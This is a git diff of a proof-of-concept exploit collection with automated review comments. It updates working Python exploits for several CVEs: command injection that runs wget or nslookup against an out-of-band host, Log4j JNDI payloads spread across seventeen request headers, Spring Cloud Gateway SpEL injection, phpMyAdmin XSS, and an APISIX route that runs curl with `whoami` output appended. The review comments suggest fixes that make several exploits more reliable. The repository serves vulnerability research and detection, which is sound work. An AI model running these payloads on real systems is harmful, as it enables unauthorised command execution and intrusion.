+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 201 or resp0.status_code == 200) and ("""sessionId""" in resp0.text) and ("""token""" in str(resp0.headers)):
result["success"] = True
diff --git a/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py b/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py
index 4a9a44dad..87b9c6d8f 100644
--- a/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py
+++ b/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py
@@ -47,9 +47,9 @@ def poc(url):
dataBlockSize=64
timeout=1
numberOfRepetitions=4
-host=$(echo 127.0.0.1; wget http://oob_domain)
+host=$(echo 127.0.0.1; wget http://{oob_domain})
X_TP_ConnName=ewan_ipoe_d
-diagnosticsState=Requested"""
+diagnosticsState=Requested""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'text/plain', 'Referer': 'http://{{Hostname}}/mainFrame.htm', 'Cookie': 'Authorization=Basic YWRtaW46YWRtaW4='}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
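Review bot: The `Referer` header on the line after the new `.format()` call still carries the nuclei template placeholder `http://{{Hostname}}/mainFrame.htm`, so the request goes out with a literal `{{Hostname}}` Referer; if the firmware compares Referer against its own host (a common anti-CSRF check on these routers, unverified here) the injection never fires. Substitute it the way the body is: `'Referer': url + '/mainFrame.htm'`, since `url` is already the formatted target origin. Note also that `.format()` is applied to the whole multi-line `data` body whose opening lines lie outside this hunk, so any literal `{` or `}` earlier in that body raises `KeyError`/`ValueError` before the request is sent — for long templated bodies `.replace("oob_domain", oob_domain)` on a unique placeholder is the safer substitution. `poc()` begins before this hunk.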
diff --git a/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py b/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py
index be89a007f..b756509d3 100644
--- a/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py
+++ b/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py
@@ -39,9 +39,9 @@ def poc(url):
path = """/api/graphql"""
method = "POST"
- data = """{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}"""
+ data = {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":None,"operationName":None}
headers = {'Content-Type': 'application/json', 'Accept': '*/*'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""data""" in resp0.text and """users""" in resp0.text and """nodes""" in resp0.text and """id""" in resp0.text and """gid://""" in resp0.text) and (resp0.status_code == 200):
result["success"] = True
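Review bot: The converted `data` dict still ships the entire GraphiQL welcome comment (`# Welcome to GraphiQL …`) ahead of the actual query, several hundred bytes of noise in every probe that makes the payload hard to audit; GraphQL ignores `#` comment lines, so the request reduces to `data = {"query": "{ users { nodes { id name username } } }", "variables": None, "operationName": None}`. The `None` → JSON `null` translation for `variables`/`operationName` is correct with `json=`, and the explicit `Content-Type` is now redundant. The success check on the next line keys on `gid://`, which is what actually identifies a GitLab response, so trimming the query does not weaken detection.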
diff --git a/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py b/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py
index c3af63e79..350f83f6c 100644
--- a/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py
+++ b/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py
@@ -108,14 +108,14 @@ def poc(url):
/c nslookup oob_domain
+ xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {oob_domain}
cmd
-"""
+""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
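Review bot: The new `.format(oob_domain=oob_domain)` at the closing `"""` is applied to the entire XML body, whose opening lines lie outside this hunk; `str.format` treats every `{`/`}` in that text as a replacement field, so a brace anywhere in the serialized payload (GUIDs in braces, embedded JSON, `${…}` expressions) raises `KeyError` or `ValueError` before the request is sent. For a long templated body a unique placeholder plus `data = data.replace("oob_domain", oob_domain)` is the safer substitution and leaves the rest of the template byte-identical. The visible `-`/`+` pair around `/c nslookup` also appears to have lost its XML element tags in this rendering, so the exact committed line should be checked in the repository. The enclosing `poc()` begins before this hunk.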
diff --git a/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py b/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py
index 30ad7ba4d..5f59f8583 100644
--- a/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py
+++ b/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py
@@ -41,10 +41,10 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/?x=${jndi:ldap://127.0.0.1#.${hostName}.oob_domain/a}"""
+ path = """/?x=${jndi:ldap://127.0.0.1#.${hostName}.%s/a}""" % oob_domain
method = "GET"
data = """"""
- headers = {'Accept': '${jndi:ldap://127.0.0.1#.${hostName}.accept.oob_domain}', 'Accept-Encoding': '${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.oob_domain}', 'Accept-Language': '${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.oob_domain}', 'Access-Control-Request-Headers': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.oob_domain}', 'Access-Control-Request-Method': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.oob_domain}', 'Authentication': 'Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.oob_domain}', 'Cookie': '${jndi:ldap://127.0.0.1#.${hostName}.cookiename.oob_domain}=${jndi:ldap://${hostName}.cookievalue.oob_domain}', 'Location': '${jndi:ldap://127.0.0.1#.${hostName}.location.oob_domain}', 'Origin': '${jndi:ldap://127.0.0.1#.${hostName}.origin.oob_domain}', 'Referer': '${jndi:ldap://127.0.0.1#.${hostName}.referer.oob_domain}', 'Upgrade-Insecure-Requests': '${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.oob_domain}', 'User-Agent': '${jndi:ldap://127.0.0.1#.${hostName}.useragent.oob_domain}', 'X-Api-Version': '${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.oob_domain}', 'X-CSRF-Token': '${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.oob_domain}', 'X-Druid-Comment': '${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.oob_domain}', 'X-Forwarded-For': '${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.oob_domain}', 'X-Origin': '${jndi:ldap://127.0.0.1#.${hostName}.xorigin.oob_domain}'}
+ headers = {'Accept': '${jndi:ldap://127.0.0.1#.${hostName}.accept.%s}' % oob_domain, 'Accept-Encoding': '${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.%s}' % oob_domain, 'Accept-Language': '${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.%s}' % oob_domain, 'Access-Control-Request-Headers': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.%s}' % oob_domain, 'Access-Control-Request-Method': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.%s}' % oob_domain, 'Authentication': 'Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.%s}' % oob_domain, 'Cookie': '${jndi:ldap://127.0.0.1#.${hostName}.cookiename.%s}=${jndi:ldap://${hostName}.cookievalue.%s}' % (oob_domain, oob_domain), 'Location': '${jndi:ldap://127.0.0.1#.${hostName}.location.%s}' % oob_domain, 'Origin': '${jndi:ldap://127.0.0.1#.${hostName}.origin.%s}' % oob_domain, 'Referer': '${jndi:ldap://127.0.0.1#.${hostName}.referer.%s}' % oob_domain, 'Upgrade-Insecure-Requests': '${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.%s}' % oob_domain, 'User-Agent': '${jndi:ldap://127.0.0.1#.${hostName}.useragent.%s}' % oob_domain, 'X-Api-Version': '${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.%s}' % oob_domain, 'X-CSRF-Token': '${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.%s}' % oob_domain, 'X-Druid-Comment': '${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.%s}' % oob_domain, 'X-Forwarded-For': '${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.%s}' % oob_domain, 'X-Origin': '${jndi:ldap://127.0.0.1#.${hostName}.xorigin.%s}' % oob_domain}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
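Review bot: The new `headers` line repeats the same JNDI probe seventeen times, differing only in the header name and its lower-cased label, leaving a very long single line with eighteen `% oob_domain` substitutions to keep in sync; a template string plus a dict comprehension keyed by header name yields byte-identical values and makes the two irregular entries (`Authentication` with its `Bearer ` prefix, `Cookie` with its second lookup) stand out instead of hiding in the middle. `%`-formatting itself is the right choice here, since the payloads contain `${…}` braces that would break `str.format`. Sketch below; the request and `verify_request` lines after it are unchanged, and `poc()` starts before the hunk.

```python
oob_domain, flag = gen_oob_domain()
jndi = "${jndi:ldap://127.0.0.1#.${hostName}.%s.%s}"
path = "/?x=${jndi:ldap://127.0.0.1#.${hostName}.%s/a}" % oob_domain
method = "GET"
data = ""
probe_headers = [
    "Accept", "Accept-Encoding", "Accept-Language",
    "Access-Control-Request-Headers", "Access-Control-Request-Method",
    "Location", "Origin", "Referer", "Upgrade-Insecure-Requests",
    "User-Agent", "X-Api-Version", "X-CSRF-Token", "X-Druid-Comment",
    "X-Forwarded-For", "X-Origin",
]
# One probe per header, labelled with the lower-cased header name so the DNS hit says which one fired.
headers = {h: jndi % (h.lower().replace("-", ""), oob_domain) for h in probe_headers}
headers["Authentication"] = "Bearer " + jndi % ("authenticationbearer", oob_domain)
headers["Cookie"] = "%s=${jndi:ldap://${hostName}.cookievalue.%s}" % (jndi % ("cookiename", oob_domain), oob_domain)
# … unchanged: request and verify_request …
```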
diff --git a/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py b/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py
index 9501b15bc..e8a505645 100644
--- a/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py
+++ b/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
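Review bot: The new `data` line builds the login form by string interpolation, so `username`/`password` reach wp-login.php unencoded and any credential containing `&`, `=`, `+`, `%` or `#` is mangled, turning a real login attempt into a silent failure that the rest of `poc()` presumably reports as not-vulnerable. Replace it with `data = urlencode({"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})` and add `from urllib.parse import urlencode` to the import block above this hunk. The hard-coded `admin`/`admin` assignments would benefit from a comment stating they are a default-credential assumption the check depends on. `poc()` continues past this hunk.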
diff --git a/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py b/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py
index 79b3188e6..48d949ba5 100644
--- a/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py
+++ b/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py
@@ -1,4 +1,6 @@
import requests
+import random
+import string
from plugins.oob import verify_request, gen_oob_domain
@@ -38,56 +40,56 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ randstr = gen_random_str(10)
try:
url = format_url(url)
oob_domain,flag = gen_oob_domain()
- path = """/actuator/gateway/routes/{{randstr}}"""
+ path = """/actuator/gateway/routes/%s""" % randstr
method = "POST"
- data = """{
- "predicates": [
- {
- "name": "Path",
- "args": {
- "_genkey_0": "/{{randstr}}/**"
- }
- }
- ],
- "filters": [
- {
- "name": "RewritePath",
- "args": {
- "_genkey_0": "#{T(java.net.InetAddress).getByName(\"oob_domain\")}",
- "_genkey_1": "/${path}"
- }
- }
- ],
- "uri": "{{RootURL}}",
- "order": 0
-}"""
+ data = {
+ "predicates": [
+ {
+ "name": "Path",
+ "args": {
+ "_genkey_0": "/%s/**" % randstr
+ }
+ }
+ ],
+ "filters": [
+ {
+ "name": "RewritePath",
+ "args": {
+ "_genkey_0": "#{T(java.net.InetAddress).getByName(\"%s\")}" % oob_domain,
+ "_genkey_1": "/${path}"
+ }
+ }
+ ],
+ "uri": url,
+ "order": 0
+ }
headers = {'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/actuator/gateway/refresh"""
method = "POST"
- data = """{
- "predicate": "Paths: [/{{randstr}}], match trailing slash: true",
- "route_id": "{{randstr}}",
- "filters": [
- "[[RewritePath #{T(java.net.InetAddress).getByName(\"oob_domain\")} = /${path}], order = 1]"
- ],
- "uri": "{{RootURL}}",
- "order": 0
-}"""
+ data = {
+ "predicate": "Paths: [/%s], match trailing slash: true" % randstr,
+ "route_id": "%s" % randstr,
+ "filters": [
+ "[[RewritePath #{T(java.net.InetAddress).getByName(\"%s\")} = /${path}], order = 1]" % oob_domain
+ ],
+ "uri": url,
+ "order": 0
+ }
headers = {'Content-Type': 'application/json'}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/actuator/gateway/routes/{{randstr}}"""
+ path = """/actuator/gateway/routes/%s""" % randstr
method = "DELETE"
- data = """"""
headers = {}
- resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp2 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
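Review bot: The route created by the first POST (`/actuator/gateway/routes/<randstr>`, carrying a SpEL `RewritePath` filter) is only deleted on the straight-line path: if the second POST to `/actuator/gateway/refresh` raises (timeout or reset — refresh is exactly where the SpEL is evaluated), control jumps to the function's `except` and the `resp2` DELETE never runs, leaving an attacker-shaped route on the target. Put the DELETE in a `finally` inside the existing `try`, and — as I read Spring Cloud Gateway, which applies route changes only on refresh — follow the DELETE with another `/actuator/gateway/refresh` so the route actually leaves the routing table; the current code refreshes only after creation. Minor: `"route_id": "%s" % randstr` is just `randstr`, and the explicit `Content-Type` headers are redundant once `json=` is used. The function's `except` and return are outside this hunk.

```python
route_path = "/actuator/gateway/routes/%s" % randstr
try:
    resp0 = requests.request(method="POST", url=url + route_path, json=data, headers=headers, timeout=10, verify=False, allow_redirects=False)
    # … unchanged: build the refresh body, POST /actuator/gateway/refresh …
finally:
    # Always remove the injected route, then refresh so the gateway drops it as well.
    resp2 = requests.request(method="DELETE", url=url + route_path, timeout=10, verify=False, allow_redirects=False)
    requests.request(method="POST", url=url + "/actuator/gateway/refresh", timeout=10, verify=False, allow_redirects=False)
```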
@@ -112,4 +114,7 @@ def format_url(url):
url = 'http://' + url
url = url.rstrip('/')
- return url
\ No newline at end of file
+ return url
+
+def gen_random_str(length):
+ return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
\ No newline at end of file
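Review bot: `gen_random_str` has no docstring and duplicates the `gen_randstr` helper that CVE-2022-24112.py adds in this same diff with a different implementation (`random.choice` here, `random.sample` there, which never repeats a character); two names for one helper across the corpus invites drift, so it belongs next to `gen_oob_domain` in `plugins` and should be imported by both files. Until then add `"""Return *length* random ASCII letters/digits; a throwaway route id, not a secret."""` so nobody reuses it as a token generator. The file still ends without a trailing newline (`\ No newline at end of file`), which the previous revision also lacked and most linters flag.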
diff --git a/2022/CVE-2022-23808/poc/pocsploit/CVE-2022-23808.py b/2022/CVE-2022-23808/poc/pocsploit/CVE-2022-23808.py
new file mode 100644
index 000000000..d0ea412a1
--- /dev/null
+++ b/2022/CVE-2022-23808/poc/pocsploit/CVE-2022-23808.py
@@ -0,0 +1,72 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+ return {
+ "author": "cckuailong",
+ "name": '''phpMyAdmin < 5.1.2 - XSS''',
+ "description": '''An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.''',
+ "severity": "medium",
+ "references": [
+ "https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A",
+ "https://github.com/dipakpanchal456/CVE-2022-23808",
+ "https://nvd.nist.gov/vuln/detail/CVE-2022-23808"
+ ],
+ "classification": {
+ "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
+ "cvss-score": "6.1",
+ "cve-id": "CVE-2022-23808",
+ "cwe-id": "CWE-79"
+ },
+ "metadata":{
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23808/vultarget"
+ },
+ "tags": ["phpmyadmin", "unauth" , "xss"],
+ }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+ url = format_url(url)
+ resp = requests.get(url, timeout=10, verify=False)
+ if "
phpMyAdmin" in resp.text or "pma_password" in resp.text or "Set-Cookie: phpMyAdmin=" in str(resp.headers) or "realm=\"phpMyAdmin" in str(resp.headers):
+ return True
+ else:
+ return False
+
+# Proof of Concept
+def poc(url):
+ result = {}
+ try:
+ url = format_url(url)
+
+ path = "/setup/index.php?page=servers&mode=test&id=\">'>"
+ method = "GET"
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+ resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ if resp.status_code == 200 and 'text/html' in str(resp.headers) and "\">'>" in resp.text:
+ result["success"] = True
+ result["info"] = info()
+ result["payload"] = url+path
+
+ except:
+ result["success"] = False
+
+ return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+ return poc(url)
+
+
+# Utils
+def format_url(url):
+ url = url.strip()
+ if not ( url.startswith('http://') or url.startswith('https://') ):
+ url = 'http://' + url
+ url = url.rstrip('/')
+
+ return url
\ No newline at end of file
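Review bot: `poc()` ends in a bare `except:`, which swallows `KeyboardInterrupt` and `SystemExit` along with real errors and reports every failure — DNS error, timeout, refused connection — as `success: False`, indistinguishable from a patched target; narrow it to `except requests.RequestException as e:` and record the reason, e.g. `result["error"] = str(e)`. The `fingerprint()` string literal that begins `if "` and continues on the next line with `phpMyAdmin"` is not a valid Python literal as printed — this looks like an extraction artefact where an HTML tag (probably `<title>`) was stripped, but it is worth confirming the committed file compiles. The reflection check `"\">'>" in resp.text` is a sound unescaped-reflection test; pairing the marker with a per-run random token would rule out false positives on pages that happen to contain that static sequence.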
diff --git a/2022/CVE-2022-23808/poc/pocsploit/wait_to_be_added b/2022/CVE-2022-23808/poc/pocsploit/wait_to_be_added
deleted file mode 100644
index 08b178987..000000000
--- a/2022/CVE-2022-23808/poc/pocsploit/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this poc / vultarget, thanks!
diff --git a/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
index f0bcc70ad..4e8f07a00 100644
--- a/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
+++ b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
@@ -7,7 +7,7 @@ def info():
"author": "cckuailong",
"name": '''ShenYu Admin Unauth Access''',
"description": '''User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.''',
- "severity": "medium",
+ "severity": "critical",
"references": [
"https://github.com/apache/incubator-shenyu/pull/2462/files",
"https://nvd.nist.gov/vuln/detail/CVE-2022-23944"
diff --git a/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py b/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py
index bde99e8ec..d63db1e4e 100644
--- a/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py
+++ b/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py
@@ -1,4 +1,6 @@
import requests
+import random
+import string
from plugins.oob import verify_request, gen_oob_domain
@@ -14,16 +16,17 @@ def info():
"https://nvd.nist.gov/vuln/detail/CVE-2022-24112",
"https://www.openwall.com/lists/oss-security/2022/02/11/3",
"https://twitter.com/sirifu4k1/status/1496043663704858625",
- "https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests"
+ "https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests",
+ "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24112/vultarget"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
- "cvss-score": "",
+ "cvss-score": "9.8",
"cve-id": "CVE-2022-24112",
"cwe-id": "CWE-290"
},
"metadata":{
- "vuln-target": "",
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24112/vultarget",
"shodan-query":'''title:"Apache APISIX Dashboard"''',
"fofa-query":'''title="Apache APISIX Dashboard"''',
"product":'''https://apisix.apache.org'''
@@ -39,6 +42,7 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ randstr = gen_randstr(10)
try:
url = format_url(url)
@@ -46,28 +50,27 @@ def poc(url):
path = """/apisix/batch-requests"""
method = "POST"
- data = """{
- "headers":{
- "X-Real-IP":"127.0.0.1",
- "Content-Type":"application/json"
- },
- "timeout":1500,
- "pipeline":[
- {
- "method":"PUT",
- "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
- "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://oob_domain/`whoami`'); return true end\"}"
- }
- ]
-}"""
+ data = {
+ "headers":{
+ "X-Real-IP":"127.0.0.1",
+ "Content-Type":"application/json"
+ },
+ "timeout":1500,
+ "pipeline":[
+ {
+ "method":"PUT",
+ "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
+ "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/%s\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl http://%s/`whoami`'); return true end\"}" % (randstr, oob_domain)
+ }
+ ]
+ }
headers = {'Content-Type': 'application/json', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """//oob_domain/`whoami`\'); return true end\\"}"\n }\n ]\n}\n', 'GET /api/{{randstr}}"""
+ path = """/api/%s""" % (randstr)
method = "GET"
- data = """"""
headers = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9'}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
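Review bot: The batch request creates a route with the fixed id `index` whose `filter_func` runs `os.execute('curl http://<oob>/`whoami`')` on every hit to `/api/<randstr>`, and nothing in `poc()` removes it, so a successful check leaves a persistent command-execution hook on the target's gateway (re-runs overwrite rather than accumulate, but the route stays). Add a cleanup batch request whose pipeline entry is a `DELETE` of `/apisix/admin/routes/index?api_key=…` and run it from a `finally` so a timeout on `resp1` cannot skip it. The callback scheme also silently changed from `https://` to `http://` in this commit; detection is DNS-based so the result is unaffected, but it deserves a word in the commit message. Building the inner `body` with `json.dumps({...})` rather than a hand-escaped string would remove the `\r\n`/`\"` noise and the risk of an unbalanced quote.

```python
try:
    # … unchanged: batch-requests PUT creating route "index", GET /api/<randstr> …
finally:
    # Remove the route again; otherwise filter_func keeps executing for every later hit.
    cleanup = {
        "headers": {"X-Real-IP": "127.0.0.1", "Content-Type": "application/json"},
        "timeout": 1500,
        "pipeline": [{"method": "DELETE",
                      "path": "/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1"}],
    }
    requests.request(method="POST", url=url + "/apisix/batch-requests", json=cleanup, timeout=10, verify=False, allow_redirects=False)
```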
@@ -92,4 +95,7 @@ def format_url(url):
url = 'http://' + url
url = url.rstrip('/')
- return url
\ No newline at end of file
+ return url
+
+def gen_randstr(length):
+ return ''.join(random.sample(string.ascii_letters + string.digits, length))
\ No newline at end of file
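Review bot: `gen_randstr` uses `random.sample`, which draws without replacement, so the result can never repeat a character and the call raises `ValueError` if `length` ever exceeds the 62-character alphabet; `random.choices(string.ascii_letters + string.digits, k=length)` is the one-call form that means what the name says. A one-line docstring would help too, e.g. `"""Random alphanumeric string of *length* chars for a throwaway route path (not a secret)."""`. CVE-2022-22947.py in this same diff adds an equivalent helper under another name (`gen_random_str`); one shared copy in `plugins` would stop the two from drifting.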
diff --git a/2022/CVE-2022-24112/vultarget/5.png b/2022/CVE-2022-24112/vultarget/5.png
new file mode 100644
index 000000000..a11f29164
Binary files /dev/null and b/2022/CVE-2022-24112/vultarget/5.png differ
diff --git a/2022/CVE-2022-24112/vultarget/README.md b/2022/CVE-2022-24112/vultarget/README.md
index 0c8fc3306..f6e3c80b6 100644
--- a/2022/CVE-2022-24112/vultarget/README.md
+++ b/2022/CVE-2022-24112/vultarget/README.md
@@ -22,6 +22,10 @@ creat a service
## Poc
-[](../poc/nuclei/CVE-2022-24112.yaml)
+[Poc1](../poc/nuclei/CVE-2022-24112.yaml)
![](4.png)
+
+[Poc2](../poc/pocsploit/CVE-2022-24112.py)
+
+![](5.png)